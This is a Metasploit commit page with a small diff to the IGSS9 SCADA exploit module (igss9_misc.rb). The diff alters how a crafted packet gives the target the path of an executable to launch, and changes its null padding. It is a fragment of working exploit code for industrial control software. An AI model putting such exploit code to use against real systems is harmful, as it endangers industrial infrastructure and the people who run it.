Skip to content

Commit 0fde6c6

Browse files
David MaloneyDavid Maloney
authored andcommitted
Land rapid7#8650, igss9 launch path
land pr to fix launch path in the igss9 exploit
2 parents c28b6a5 + 45af651 commit 0fde6c6

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/scada/igss9_misc.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -117,8 +117,8 @@ def exe_packet(filename)
117117
pkt << "\x00\x00"
118118
pkt << "\x0A"
119119
pkt << "\x00"*31
120-
pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#{filename}\""
121-
pkt << "\x00"*143
120+
pkt << "#{base}#{filename}\""
121+
pkt << "\x00"*163 #only for 1 caracter + .exe (i.exe for example)
122122

123123
return pkt
124124
end

0 commit comments

Comments
 (0)